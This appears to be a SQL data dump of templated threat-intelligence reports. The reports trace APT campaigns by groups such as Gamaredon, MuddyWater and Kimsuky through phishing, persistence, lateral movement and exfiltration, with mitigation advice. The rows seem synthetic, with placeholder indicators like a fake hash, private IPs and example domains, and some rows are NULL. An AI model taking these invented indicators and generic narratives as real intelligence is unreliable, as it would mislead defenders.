(720, 146, 1275, 1, 'Investigation into Malicious RTF Attachment', '### Report on Suspicious Email\n\n**Details:**\nThe suspicious email was identified as a phishing attempt containing a malicious RTF attachment. The attachment exploits vulnerabilities to execute arbitrary code on the target\'s system. The email was crafted to appear as an official communication from a trusted source within the Southeast Asian government sector.\n\n**Indicators of Compromise (IOCs):**\n- **Email Subject:** \"Urgent Document Review\"\n- **Sender Address:** spoofed@trustedsource.gov\n- **Attachment Name:** document_review.rtf\n\n**Next Steps:**\n- Conduct a deeper analysis of the malicious payload executed via the Soul Framework to understand its capabilities and objectives.', '2026-02-24 03:13:51'),
(721, 146, 1276, 2, 'Analysis of Soul Framework Execution', '### Report on Malware Execution\n\n**Details:**\nThe Soul Framework was executed after the malicious RTF attachment was opened by the target. This framework is known for its modular architecture, which allows attackers to deploy various modules for different purposes, including reconnaissance, data collection, and command-and-control operations.\n\n**Technical Analysis:**\n- The payload establishes a connection with a command-and-control server to receive further instructions.\n- Modules observed include system information collection and credential theft.\n\n**Next Steps:**\n- Monitor for registry modifications to identify persistence mechanisms employed by the attackers.', '2026-02-24 03:13:51'),
(722, 146, 1277, 3, 'Registry Modification Persistence Mechanism', '### Report on Persistence Mechanism\n\n**Details:**\nThe attackers have modified system registry keys to ensure the persistence of their malware on the compromised system. By establishing persistence, the threat actors can maintain access to the system even after a reboot.\n\n**Technical Analysis:**\n- Registry keys modified to include malicious scripts that execute on startup.\n- Persistence techniques observed include Run keys and Scheduled Tasks.\n\n**Next Steps:**\n- Investigate unauthorized access to internal systems as attackers may be attempting lateral movement.', '2026-02-24 03:13:51'),
(723, 146, 1278, 4, 'Unauthorized Access and Lateral Movement', '### Report on Unauthorized Access\n\n**Details:**\nEvidence suggests that the attackers have gained unauthorized access to sensitive internal systems. This indicates a successful lateral movement from the initially compromised host, possibly through stolen credentials.\n\n**Technical Analysis:**\n- Unusual login attempts from compromised accounts detected across multiple systems.\n- Network traffic analysis shows connections to sensitive databases and file servers.\n\n**Next Steps:**\n- Monitor network traffic for data exfiltration attempts, particularly through encrypted channels.', '2026-02-24 03:13:51'),
(724, 146, 1279, 5, NULL, NULL, '2026-02-24 03:13:51'),
(725, 147, 1280, 1, 'Analysis of Phishing Tactics', '### Overview\nFollowing the detection of a phishing email targeting Uyghur and Tibetan activists, this report delves into the tactics used by Scarlet Mimic to gain initial access.\n\n### Phishing Strategy\nScarlet Mimic employs highly personalized spear-phishing campaigns, often mimicking trusted contacts of the targets. These emails typically contain malicious attachments or links designed to deploy the FakeM malware.\n\n### Recommendations\n- **Educate:** Conduct awareness training for activists on identifying phishing attempts.\n- **Filter Implementation:** Enhance email filtering to detect and quarantine suspicious emails.\n\n### Implications\nThe successful execution of the phishing campaign paves the way for malware deployment, emphasizing the need for proactive email security measures.', '2026-02-24 03:14:16'),
(726, 147, 1281, 2, 'FakeM Malware Execution Analysis', '### Overview\nPost-phishing detection, the FakeM malware has been activated on targeted devices. This report examines the malware\'s execution process and its immediate impact.\n\n### Malware Capabilities\nFakeM enables remote access to compromised systems, allowing attackers to monitor activities and exfiltrate sensitive information. It is designed to operate stealthily, minimizing detection.\n\n### Indicators of Compromise (IoCs)\n- **File Paths:** Unusual executable files in user directories.\n- **System Anomalies:** Unexpected processes and network connections.\n\n### Next Steps\nThe activation of FakeM sets the stage for persistent system compromise through registry modifications.', '2026-02-24 03:14:16'),
(727, 147, 1282, 3, 'Registry Modification and Persistence Mechanisms', '### Overview\nFollowing the execution of FakeM, registry modifications have been detected, indicating attempts to establish persistence on infected systems.\n\n### Technical Details\nThe malware modifies registry keys to ensure it runs every time the system starts, making removal difficult without specialized tools.\n\n### Detection and Response\n- **Registry Monitoring:** Implement continuous monitoring for unauthorized changes.\n- **System Audits:** Conduct regular audits to identify and mitigate persistence mechanisms.\n\n### Implications\nThis persistence mechanism allows Scarlet Mimic to maintain long-term access to compromised systems, facilitating further network intrusion activities.', '2026-02-24 03:14:16'),
(728, 147, 1283, 4, 'Unauthorized Network Access and Lateral Movement', '### Overview\nThe persistence of FakeM has allowed Scarlet Mimic to gain unauthorized access to internal networks, highlighting a critical phase of lateral movement.\n\n### Attack Progression\nThe attackers use stolen credentials and exploit vulnerabilities to move laterally within the network, targeting additional systems and expanding their foothold.\n\n### Mitigation Strategies\n- **Access Controls:** Implement strict access controls and network segmentation.\n- **Vulnerability Management:** Regularly update and patch systems to close security gaps.\n\n### Implications\nLateral movement increases the risk of widespread data exfiltration, necessitating urgent measures to prevent sensitive information from being transferred to external servers.', '2026-02-24 03:14:16'),
(729, 147, 1284, 5, NULL, NULL, '2026-02-24 03:14:16'),
(730, 148, 1285, 1, 'Analysis of Spear Phishing Techniques', '### Spear Phishing Campaign Detected\n\nFollowing the detection of a spear phishing campaign targeting Ukrainian activists and separatists, a detailed analysis was conducted to understand the methods used by the threat actors. The phishing emails were crafted with high precision, utilizing subject lines relevant to ongoing regional issues. Attachments and links contained in these emails were embedded with malicious scripts designed to deploy malware upon interaction. This initial phase of the Groundbait campaign aimed to compromise targets by exploiting human factors and leveraging trust within activist networks.', '2026-02-24 03:14:42'),
(731, 148, 1286, 2, 'Deployment of Remote Access Trojans', '### Remote Access Trojan Execution\n\nAfter successful phishing attacks, Remote Access Trojans (RATs) were deployed on compromised systems. These RATs provided the attackers with the capability to remotely control the infected machines, executing commands and gathering intelligence on victim activities. The RATs were observed to utilize common communication protocols to blend in with normal network traffic, reducing the chance of detection. This stage was crucial for establishing a foothold within target networks and set the stage for further exploitation and persistence.', '2026-02-24 03:14:42'),
(732, 148, 1287, 3, 'Persistence Mechanisms via Registry Modifications', '### Establishing Persistence with Registry Modifications\n\nTo ensure long-term access to compromised systems, the attackers employed registry modifications as a persistence mechanism. By altering registry keys, the RATs were configured to execute upon system startup, ensuring continued control even after system reboots. This method of persistence is indicative of the attackers\' intent to maintain an enduring presence in the target environment, allowing for ongoing intelligence gathering and potential future operations.', '2026-02-24 03:14:42'),
(733, 148, 1288, 4, 'Credential Dumping for Lateral Movement', '### Credential Dumping for Lateral Movement\n\nIn preparation for lateral movement within targeted networks, attackers engaged in credential dumping activities. By extracting sensitive authentication data from compromised systems, they aimed to escalate privileges and access additional resources. This stage involved the use of tools designed to obtain passwords and hashes from memory, databases, and other system locations. The ability to move laterally was critical for expanding their reach and accessing valuable information across the network.', '2026-02-24 03:14:42'),
(734, 148, 1289, 5, NULL, NULL, '2026-02-24 03:14:42'),
(735, 149, 1290, 1, 'Unauthorized Access Details and Indicators', '# Unauthorized Access Detected\n\n## Summary\nFollowing the initial alert of unauthorized access within Ukrainian infrastructure, analysis indicates the exploitation of a known vulnerability in the remote access software commonly used by targeted organizations. This unauthorized access is suspected to be the entry point used by the Advanced Persistent Threat (APT) group.\n\n## Indicators of Compromise (IoCs)\n- **IP Addresses:** 192.168.1.10, 192.168.1.15\n- **Malicious URLs:** `http://malicious-site.example.com`\n- **Compromised Systems:** Domain controllers and administrative workstations\n\n## Implications\nThe initial access achieved by the APT group is critical in understanding their foothold and potential intent to carry out further activities, including surveillance and data exfiltration.', '2026-02-24 03:15:13'),
(736, 149, 1291, 2, 'Analysis of Suspicious PowerShell Script Execution', '# Suspicious PowerShell Activity\n\n## Summary\nPost the detection of unauthorized access, a suspicious PowerShell script was executed on multiple compromised systems. This script is designed to download additional payloads and establish connections to command and control (C2) servers.\n\n## Technical Details\n- **Script Functionality:** Downloads and executes additional malware components\n- **C2 Communication:** Utilizes HTTPS for encrypted communication\n- **Script Hash:** `abcd1234efgh5678ijkl9012mnop3456`\n\n## Recommendations\nImmediate containment of affected systems is recommended. Network traffic to the identified C2 infrastructure should be monitored and blocked to prevent further command execution and data exfiltration.', '2026-02-24 03:15:13'),
(737, 149, 1292, 3, 'Persistence Mechanism via Registry Modification', '# Persistence Mechanism Established\n\n## Summary\nFurther investigation reveals that the APT group has established a persistence mechanism through registry modifications. This allows them to maintain access to the compromised systems even after reboots.\n\n## Technical Details\n- **Registry Key:** `HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MaliciousScript`\n- **Payload:** Malicious script set to execute on startup\n- **Stealth Techniques:** Obfuscation of registry entries to avoid detection\n\n## Impact\nThis persistence mechanism ensures long-term access for the APT group, enabling ongoing surveillance and data collection activities. Immediate remediation is necessary to remove unauthorized registry entries and prevent further exploitation.', '2026-02-24 03:15:13'),
(738, 149, 1293, 4, 'Lateral Movement Tactics and Techniques', '# Lateral Movement Across Network\n\n## Summary\nThe APT group has successfully moved laterally across the network, compromising additional systems. This movement is facilitated through the use of stolen credentials and exploitation of trust relationships between systems.\n\n## Techniques Observed\n- **Credential Dumping:** Harvesting of credentials from memory\n- **Pass-the-Hash:** Using hashed credentials to access other systems\n- **Remote Desktop Protocol (RDP):** Used for remote access to compromised systems\n\n## Countermeasures\nNetwork segmentation and strict access controls are recommended to limit the ability of attackers to move laterally. Enhanced monitoring of privileged account activity is also advised to detect and respond to suspicious actions.', '2026-02-24 03:15:13'),
(739, 149, 1294, 5, NULL, NULL, '2026-02-24 03:15:13'),
(740, 150, 1295, 1, 'Insights into Template Injection Tactics', '### Overview\nFollowing the detection of suspicious email delivery, further analysis reveals Gamaredon\'s use of advanced template injection techniques. This method involves embedding malicious code into legitimate document templates, a tactic aimed at bypassing security filters.\n\n### Key Observations\n- **Infection Vectors**: The group exploits common document formats, such as Word and Excel, to deliver payloads.\n- **Code Analysis**: The injected code often initiates a command to download additional malware from remote servers.\n\n### Implications\nUnderstanding the intricacies of template injection is crucial for developing countermeasures to prevent further infiltration.', '2026-02-24 03:16:14'),
(741, 150, 1296, 2, 'Analysis of Backdoor Installation Techniques', '### Overview\nUpon identification of template injection, the next phase involves establishing persistence through backdoor installation. This step is critical as it allows Gamaredon to maintain long-term access to compromised systems.\n\n### Key Observations\n- **Backdoor Methods**: Utilization of custom-developed malware families, often disguised as legitimate software.\n- **Persistence Techniques**: Use of registry modifications and scheduled tasks to ensure the backdoor remains active.\n\n### Mitigation Strategies\nImplementing robust endpoint detection and response solutions can help in identifying and neutralizing these backdoor installations.', '2026-02-24 03:16:14'),
(742, 150, 1297, 3, 'Credential Harvesting Strategies Uncovered', '### Overview\nThe backdoor installations facilitate credential harvesting, allowing Gamaredon to gain access to sensitive information and further infiltrate networks.\n\n### Key Observations\n- **Targeted Credentials**: Focus on administrative accounts that provide broader access to systems.\n- **Harvesting Tools**: Use of both custom and publicly available tools to extract credentials.\n\n### Recommendations\nEnhancing password policies and implementing multi-factor authentication can significantly reduce the risk of credential compromise.', '2026-02-24 03:16:14'),
(743, 150, 1298, 4, 'Lateral Movement Techniques in Gamaredon\'s Playbook', '### Overview\nWith credentials in hand, Gamaredon initiates lateral movement to escalate privileges and compromise additional systems within the network.\n\n### Key Observations\n- **Movement Tactics**: Leveraging legitimate administrative tools such as PowerShell and PsExec.\n- **Network Reconnaissance**: Identification of high-value targets by scanning internal networks.\n\n### Defense Measures\nNetwork segmentation and continuous monitoring are essential in detecting and halting lateral movement attempts.', '2026-02-24 03:16:14'),
(744, 150, 1299, 5, 'Data Exfiltration Methods and Prevention', '### Overview\nThe penultimate step involves the exfiltration of valuable data, often the primary objective of Gamaredon\'s campaigns.\n\n### Key Observations\n- **Exfiltration Techniques**: Use of encrypted channels and cloud storage services to smuggle out data without detection.\n- **Targeted Data**: Focus on national security information and confidential government communications.\n\n### Prevention Strategies\nDeploying data loss prevention systems and monitoring outbound traffic can help identify and block exfiltration attempts.', '2026-02-24 03:16:14'),
(745, 150, 1300, 6, 'Attribution Analysis: Links to Russian Security Services', '### Overview\nThe final phase of the operation examines potential ties between Gamaredon and Russian security services, providing insight into the campaign\'s broader geopolitical implications.\n\n### Key Observations\n- **Evidence of Collaboration**: Overlapping infrastructure and techniques with known Russian state-sponsored groups.\n- **Strategic Objectives**: Alignment with Russian geopolitical goals, particularly concerning Ukraine.\n\n### Conclusion\nAttribution remains a complex challenge; however, the growing body of evidence suggests a coordinated effort between Gamaredon and Russian state entities.', '2026-02-24 03:16:14'),
(746, 150, 1301, 7, NULL, NULL, '2026-02-24 03:16:14'),
(747, 152, 1322, 1, 'Analysis of Initial Access Tactics by Moses Staff', '# Analysis of Initial Access Tactics by Moses Staff\n\n## Overview\nFollowing the detection of the phishing campaign targeting Israeli entities, further analysis has been conducted to understand the tactics, techniques, and procedures (TTPs) employed by Moses Staff.\n\n## Phishing Campaign Insights\n- **Targeted Entities**: Government agencies, critical infrastructure, and private sector organizations.\n- **Phishing Techniques**: Use of spear-phishing emails with malicious attachments or links.\n- **Email Themes**: Often leverage geopolitical tensions, masquerading as official communications or urgent requests.\n\n## Recommendations\n- **Awareness Training**: Enhance phishing awareness training for all employees.\n- **Email Filtering**: Implement advanced email filtering solutions to detect and block phishing attempts.\n\n## Next Steps\nPrepare for potential malware deployment as the threat actors may leverage initial access for executing payloads like the DCSrv wiper.', '2026-03-01 22:55:52'),
(748, 152, 1323, 2, 'DCSrv Wiper Deployment and Impact Analysis', '# DCSrv Wiper Deployment and Impact Analysis\n\n## Overview\nIn the wake of the successful initial access, Moses Staff has deployed the DCSrv wiper, aiming to disrupt operations within targeted Israeli organizations.\n\n## Malware Execution Details\n- **Wiper Characteristics**: The DCSrv wiper is designed to overwrite critical system files, rendering systems inoperable.\n- **Deployment Method**: Likely deployed via compromised systems accessed through phishing.\n- **Impact**: Significant operational disruption, data loss, and potential reputational damage.\n\n## Mitigation Strategies\n- **Regular Backups**: Ensure regular data backups to facilitate quick recovery.\n- **Endpoint Protection**: Deploy robust endpoint protection solutions to detect and prevent malware execution.\n\n## Next Steps\nAnticipate potential data exfiltration activities and prepare defenses to secure sensitive information from being leaked.', '2026-03-01 22:55:52'),
(749, 152, 1324, 3, NULL, NULL, '2026-03-01 22:55:52'),
(750, 151, 1325, 1, 'Initial Access: Analysis of Dropbox API Misuse', '### Overview\nAfter detecting suspicious activity involving the Dropbox API, further analysis has revealed that attackers are leveraging the API for unauthorized access. This method allows them to bypass traditional security measures by mimicking legitimate traffic.\n\n### Technical Details\n- **IP Addresses**: The suspicious activity is originating from IP addresses commonly associated with VPN services, indicating attempts to mask the attackers\' true location.\n- **API Calls**: Attackers are using a complex sequence of API calls to download and upload sensitive files.\n\n### Recommendations\n- **API Monitoring**: Implement more robust logging and monitoring of API calls.\n- **IP Filtering**: Block known malicious IP ranges associated with similar activities.\n\n### Next Steps\nPrepare for potential execution of malware, potentially xCaon, as the attackers establish a foothold.', '2026-03-01 22:55:55'),
(751, 151, 1326, 2, 'Execution Phase: xCaon Malware Analysis', '### Overview\nFollowing the initial access, our systems detected the execution of xCaon malware. This malware is known for its stealth capabilities and ability to evade detection.\n\n### Technical Details\n- **Payload Delivery**: xCaon was deployed via a disguised Dropbox link.\n- **Behavioral Analysis**: The malware exhibits polymorphic behavior, altering its code to avoid signature-based detection.\n\n### Recommendations\n- **Endpoint Detection**: Enhance endpoint security to detect anomalous behavior.\n- **File Integrity Monitoring**: Implement file integrity checks to detect unauthorized changes.\n\n### Next Steps\nInvestigate persistence mechanisms, as attackers may attempt to maintain their access through scheduled tasks or other methods.', '2026-03-01 22:55:55'),
(752, 151, 1327, 3, 'Persistence Mechanisms: Scheduled Tasks Identified', '### Overview\nAnalysis indicates that the attackers have established persistence on compromised systems using scheduled tasks, ensuring their malware remains active after reboots.\n\n### Technical Details\n- **Task Creation**: Malicious tasks are created to run xCaon malware at regular intervals.\n- **Obfuscation Techniques**: Task names and descriptions are designed to resemble legitimate system processes.\n\n### Recommendations\n- **Task Scheduler Audit**: Conduct regular audits of scheduled tasks for any unauthorized entries.\n- **User Training**: Educate users on recognizing and reporting suspicious system behavior.\n\n### Next Steps\nMonitor for lateral movement attempts, as attackers may seek to expand their access within the network.', '2026-03-01 22:55:55'),
(753, 151, 1328, 4, 'Lateral Movement Detected: Internal Network Breach', '### Overview\nUnauthorized access to internal networks has been detected, indicating the attackers are moving laterally to compromise additional systems.\n\n### Technical Details\n- **Compromised Credentials**: Attackers are using stolen credentials to access network resources.\n- **Network Traffic**: Unusual traffic patterns suggest data is being accessed from multiple endpoints.\n\n### Recommendations\n- **Network Segmentation**: Implement network segmentation to restrict lateral movement.\n- **Credential Management**: Enforce strong password policies and multi-factor authentication.\n\n### Next Steps\nFocus on detecting and preventing data exfiltration, as attackers are likely to attempt data theft via encrypted channels.', '2026-03-01 22:55:55'),
(754, 151, 1329, 5, NULL, NULL, '2026-03-01 22:55:55'),
(755, 153, 1330, 1, 'Investigation into Suspicious Phishing Email', '### Analysis of Initial Access Vector\n\nFollowing the detection of a suspicious phishing email targeting Israeli entities, further investigation has revealed that the email contained a malicious attachment designed to bypass standard security protocols. The attachment exploits a known vulnerability in outdated email clients, delivering a payload that establishes an initial foothold for the Agrius APT.\n\n#### Key Findings:\n- **Email Source:** Traced back to a compromised server in Eastern Europe.\n- **Payload Analysis:** The attachment is a macro-enabled document that, when opened, executes a PowerShell script to download additional malware components.\n\n#### Recommendations:\n- Update email client software to mitigate vulnerabilities.\n- Implement stricter email filtering to detect similar threats.', '2026-03-01 22:56:26'),
(756, 153, 1331, 2, 'Apostle Wiper Execution Attempt Analysis', '### Examination of Execution Tactics\n\nIn the wake of the Apostle wiper execution attempt, forensic analysis has provided insights into the methods employed by Agrius APT. The wiper was disguised as ransomware, demanding payment in cryptocurrency but primarily aimed at data destruction.\n\n#### Key Observations:\n- **Execution Method:** Utilizes scheduled tasks to trigger the wiper payload.\n- **Deceptive Tactics:** Mimics ransomware to confuse incident response teams and delay mitigation efforts.\n\n#### Mitigation Strategies:\n- Audit scheduled-task creation (Security event 4698 and the TaskScheduler/Operational log) and restrict task-creation rights on servers; the Task Scheduler service itself cannot be disabled without breaking Windows, so monitoring rather than service removal is the control.\n- Maintain offline, tested backups: a wiper disguised as ransomware leaves no recovery path through payment.\n- Enhance logging and monitoring to quickly detect similar execution patterns.', '2026-03-01 22:56:26'),
(757, 153, 1332, 3, 'Persistence Mechanism Discovered', '### Persistence Techniques of Agrius APT\n\nAfter analyzing the persistence mechanism deployed by Agrius APT, it has been determined that the threat actors utilize multiple strategies to maintain access to compromised systems.\n\n#### In-Depth Insights:\n- **Registry Modifications:** Alterations to Windows registry settings to ensure malware execution on startup.\n- **Scheduled Tasks:** New tasks created to periodically check-in with command and control servers.\n\n#### Defensive Measures:\n- Regular audits of registry changes and scheduled tasks.\n- Implement application whitelisting to prevent unauthorized changes.', '2026-03-01 22:56:26'),
(758, 153, 1333, 4, 'Lateral Movement Pathway Analysis', '### Understanding Lateral Movement Tactics\n\nThe identification of lateral movement pathways has revealed the sophisticated techniques employed by Agrius APT to spread within targeted networks.\n\n#### Pathway Analysis:\n- **Credential Dumping:** Obtaining credentials to access other systems within the network.\n- **Use of Admin Tools:** Leveraging legitimate administrative tools to move laterally without detection.\n\n#### Countermeasures:\n- Implement MFA (Multi-Factor Authentication) to protect sensitive accounts.\n- Monitor network traffic for unusual patterns indicative of lateral movement.', '2026-03-01 22:56:26'),
(759, 153, 1334, 5, NULL, NULL, '2026-03-01 22:56:26'),
(760, 154, 1335, 1, 'Analysis of Malicious PowerShell Script Execution', '# Overview\nFollowing the detection of a suspicious phishing email, further analysis has revealed that the email was designed to execute a PowerShell script upon opening a malicious attachment. This script is crafted to execute without raising suspicions by leveraging Living Off The Land Binaries (LOLBins).\n\n# Key Findings\n- The script uses obfuscation techniques to evade detection by traditional antivirus solutions.\n- It establishes a connection to a remote server, likely part of MuddyWater\'s Command and Control (C2) infrastructure.\n- The script is capable of downloading additional payloads to enhance its functionality.\n\n# Recommendations\n- Implement stricter email filtering rules to prevent similar phishing attempts.\n- Educate employees on recognizing phishing emails.\n- Monitor network traffic for unusual PowerShell activity.', '2026-03-01 22:56:56'),
(761, 154, 1336, 2, 'Persistence Mechanisms of MuddyWater\'s Backdoor', '# Overview\nAfter executing the malicious PowerShell script, a persistent backdoor has been established on the compromised systems. This backdoor allows MuddyWater to maintain access over extended periods.\n\n# Key Findings\n- Persistence is achieved by modifying registry entries to ensure the script runs at startup.\n- The backdoor is designed to blend in with legitimate system processes to avoid detection.\n- It has capabilities to receive commands from the C2 server for further exploitation.\n\n# Recommendations\n- Conduct regular audits of startup entries and services.\n- Employ endpoint detection and response (EDR) solutions to identify anomalies.\n- Regularly update and patch systems to prevent exploitation of known vulnerabilities.', '2026-03-01 22:56:56'),
(762, 154, 1337, 3, 'Unauthorized Network Access and Lateral Movement Tactics', '# Overview\nThe persistent backdoor has enabled MuddyWater to gain unauthorized access to the internal network. There are indicators of lateral movement as the threat actors explore the network.\n\n# Key Findings\n- MuddyWater is using legitimate credentials obtained through credential dumping to navigate the network.\n- Tools like PsExec and WMI are being leveraged to move laterally between systems.\n- Network mapping activities have been observed, likely for reconnaissance purposes.\n\n# Recommendations\n- Implement network segmentation to limit movement within the network.\n- Enforce multi-factor authentication (MFA) to enhance security of user accounts.\n- Monitor for unusual account activity and lock accounts showing suspicious behavior.', '2026-03-01 22:56:56'),
(763, 154, 1338, 4, 'Data Exfiltration Techniques Employed by MuddyWater', '# Overview\nEvidence suggests that MuddyWater has begun exfiltrating sensitive data from the compromised network. This data exfiltration is a critical phase of their operation.\n\n# Key Findings\n- Data is being compressed and encrypted before exfiltration to obscure its contents and evade detection.\n- Exfiltration is conducted over common protocols such as HTTP/HTTPS, making it difficult to differentiate from legitimate traffic.\n- Specific data types targeted include customer records and network infrastructure details.\n\n# Recommendations\n- Implement data loss prevention (DLP) solutions to detect and block unauthorized data transfers.\n- Inspect outbound traffic for anomalies in size and frequency.\n- Conduct a thorough review of access logs to identify compromised endpoints.', '2026-03-01 22:56:56'),
(764, 154, 1339, 5, NULL, NULL, '2026-03-01 22:56:56'),
(765, 155, 1340, 1, 'Analysis of Initial Access Tactics', '# Analysis of Initial Access Tactics\n\n## Overview\nFollowing the detection of a suspicious spear phishing email, further investigation has revealed the use of social engineering techniques to gain initial access. The email contained malicious attachments and links designed to lure employees into executing harmful scripts.\n\n## Key Findings\n- **Payload Delivery**: The email is crafted with industry-specific language to increase credibility.\n- **Targeted Sectors**: Primarily targeting oil, gas, and telecom sectors.\n- **Malware Analysis**: The malicious attachment is a downloader for DanBot malware.\n\n## Next Steps\nFocus on understanding the execution phase of DanBot to prevent further infiltration.', '2026-03-01 22:57:36'),
(766, 155, 1341, 2, 'Execution Phase of DanBot Malware', '# Execution Phase of DanBot Malware\n\n## Overview\nAfter initial access via spear phishing, the execution of DanBot malware was successfully detected. DanBot is being executed to establish a foothold within the network.\n\n## Key Findings\n- **Execution Method**: Utilizes PowerShell scripts to evade traditional antivirus detection.\n- **Obfuscation Techniques**: Employs code obfuscation to hinder analysis.\n- **Immediate Actions**: System scans indicate multiple instances of DanBot running on critical servers.\n\n## Next Steps\nInvestigate persistence mechanisms to understand how Lyceum maintains access to compromised systems.', '2026-03-01 22:57:36'),
(767, 155, 1342, 3, 'Persistence Mechanisms Uncovered', '# Persistence Mechanisms Uncovered\n\n## Overview\nPost-execution analysis revealed the establishment of persistence mechanisms by the DanBot malware to ensure continued access.\n\n## Key Findings\n- **Registry Alterations**: Modifications in registry keys to auto-start malware upon system boot.\n- **Scheduled Tasks**: Creation of hidden scheduled tasks for periodic execution.\n- **Fileless Persistence**: Using living-off-the-land techniques to avoid detection.\n\n## Next Steps\nFocus on detecting lateral movement and credential harvesting activities.', '2026-03-01 22:57:36'),
(768, 155, 1343, 4, 'Credential Harvesting Activities Detected', '# Credential Harvesting Activities Detected\n\n## Overview\nWith persistence established, Lyceum is actively harvesting credentials to move laterally within the network.\n\n## Key Findings\n- **Credential Dumping Tools**: Use of Mimikatz to extract passwords and hashes.\n- **Targeted Accounts**: High-value accounts with privileged access are being compromised.\n- **Network Traffic**: Increased anomalous traffic between critical nodes.\n\n## Next Steps\nPrepare for potential data exfiltration by monitoring data staging activities.', '2026-03-01 22:57:36'),
(769, 155, 1344, 5, 'Data Staging for Exfiltration Identified', '# Data Staging for Exfiltration Identified\n\n## Overview\nCredential harvesting success has enabled Lyceum to prepare sensitive data for exfiltration.\n\n## Key Findings\n- **Data Aggregation**: High-value data from oil, gas, and telecom sectors being consolidated.\n- **Staging Locations**: Temporary storage on compromised workstations identified.\n- **Encryption**: Data is being encrypted before exfiltration attempts.\n\n## Next Steps\nImmediate containment and monitoring of network egress points to prevent data exfiltration.', '2026-03-01 22:57:36'),
(770, 155, 1345, 6, NULL, NULL, '2026-03-01 22:57:36'),
(771, 156, 1346, 1, 'Phishing Analysis Unveiled', '## Phishing Analysis Unveiled\n\n**Context:** After detecting a suspicious email that potentially targeted South Korean entities, further analysis was conducted to dissect the email\'s components and intent.\n\n### Key Findings:\n- **Email Origin**: The email was traced back to a known IP address associated with previous Kimsuky operations.\n- **Content Analysis**: The email included a malicious attachment disguised as a PDF invoice, aimed at luring targets into executing the attached file.\n- **Targeted Entities**: Primarily aimed at South Korean defense contractors and government officials.\n\n### Next Steps:\n- Enhance email filtering systems to detect similar phishing attempts.\n- Educate potential targets on recognizing phishing emails.', '2026-03-01 23:01:17'),
(772, 156, 1347, 2, 'AppleSeed Backdoor: Infiltration and Installation', '## AppleSeed Backdoor: Infiltration and Installation\n\n**Context:** Following the phishing attack, the successful execution of the malicious attachment led to the installation of the AppleSeed backdoor on the compromised systems.\n\n### Key Insights:\n- **Malware Behavior**: Upon execution, the backdoor established a connection with a remote command-and-control server.\n- **Capabilities**: The backdoor allows for remote access, file manipulation, and system reconnaissance.\n- **Indicators of Compromise (IoCs)**: Specific file paths and registry keys were altered to facilitate the backdoor\'s operation.\n\n### Recommendations:\n- Conduct a thorough system scan to identify and remove the backdoor.\n- Update security protocols to prevent future installations.', '2026-03-01 23:01:17'),
(773, 156, 1348, 3, 'Persistence Mechanism Analysis', '## Persistence Mechanism Analysis\n\n**Context:** After the installation of the AppleSeed backdoor, a persistence mechanism was activated to ensure continued access to the compromised systems.\n\n### Mechanism Details:\n- **Registry Modifications**: The malware altered registry entries to execute the backdoor upon system start.\n- **Scheduled Tasks**: A scheduled task was created to periodically check and re-establish the backdoor\'s connection if disrupted.\n\n### Mitigation Strategies:\n- Regularly audit registry and task scheduler entries for unauthorized changes.\n- Implement endpoint detection and response (EDR) solutions to monitor and block persistence activities.', '2026-03-01 23:01:17'),
(774, 156, 1349, 4, 'Credential Harvesting Detected', '## Credential Harvesting Detected\n\n**Context:** As the operation progressed, signs of credential harvesting were detected, indicating an attempt to gain further access and control.\n\n### Observations:\n- **Keylogging Activity**: The backdoor included keylogging functionality to capture user credentials.\n- **Credential Dumping**: Tools were deployed to extract saved credentials from web browsers and password vaults.\n\n### Countermeasures:\n- Enforce multi-factor authentication (MFA) to limit the impact of credential theft.\n- Educate users on secure password practices and the risks of password reuse.', '2026-03-01 23:01:17'),
(775, 156, 1350, 5, NULL, NULL, '2026-03-01 23:01:17'),
(776, 157, 1351, 1, 'Phishing Email Campaign Analysis', '## Summary\nFollowing the detection of a phishing email, our analysis reveals that the email was crafted to appear as an internal memo regarding software updates. The email contained a malicious attachment disguised as a PDF file.\n\n## Technical Details\n- **Sender:** Spoofed internal address\n- **Attachment:** `update_instructions.pdf.exe`\n- **Target:** Employees in the finance department\n\n## Next Steps\nWith the execution of the malware likely through the attachment, it is imperative to monitor for any suspicious processes or unusual network traffic indicating malware execution.', '2026-03-01 23:01:37'),
(777, 157, 1352, 2, 'Malware Execution and Initial Payload', '## Summary\nThe execution of the malware was confirmed on several workstations. The initial payload was a downloader that fetched a more sophisticated second-stage malware.\n\n## Technical Details\n- **Initial Payload:** Downloader Trojan\n- **C2 Server:** `hxxp://malicious-server.com`\n- **Downloaded Malware:** Banking Trojan\n\n## Next Steps\nWith persistence mechanisms likely being established, it is crucial to inspect startup folders and scheduled tasks for unauthorized entries.', '2026-03-01 23:01:37'),
(778, 157, 1353, 3, 'Establishment of Persistence Mechanisms', '## Summary\nPersistence has been achieved via both registry run keys and scheduled tasks. This ensures the malware remains active even after system reboots.\n\n## Technical Details\n- **Registry Key:** `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater`\n- **Scheduled Task:** `System Maintenance`\n\n## Next Steps\nFocus shifts to detecting lateral movement within the network, as compromised hosts may attempt to access additional systems.', '2026-03-01 23:01:37'),
(779, 157, 1354, 4, 'Lateral Movement and Network Propagation', '## Summary\nLateral movement has been detected with the use of credential dumping tools and exploitation delivered over SMB.\n\n## Technical Details\n- **Tools Used:** Mimikatz for credential harvesting\n- **Exploitation Method:** Windows Print Spooler remote code execution (CVE-2021-34527, PrintNightmare), reached over SMB named pipes; note this is a Print Spooler flaw, not a vulnerability in the SMB protocol itself\n\n## Next Steps\nAttention must now focus on data exfiltration signs, particularly monitoring outbound network traffic for anomalies.', '2026-03-01 23:01:37'),
(780, 157, 1355, 5, NULL, NULL, '2026-03-01 23:01:37'),
(781, 158, 1356, 1, 'Analysis of Initial Access Tactics', '### Context\nFollowing the **Suspicious Access Attempt Detected** alert, our analysis suggests that the adversary leveraged spear-phishing emails to gain initial access. These emails contained links redirecting users to a malicious website mimicking legitimate cryptocurrency services.\n\n### TTPs Observed\n- **Spear-phishing Emails**: Crafted emails targeting key personnel within crypto startups.\n- **Malicious Links**: Embedded URLs leading to a clone site hosting the AppleJeus malware.\n\n### Next Steps\nEnhanced monitoring for execution of malware payloads is recommended to confirm adversary presence and prepare for subsequent alerts.', '2026-03-01 23:02:16'),
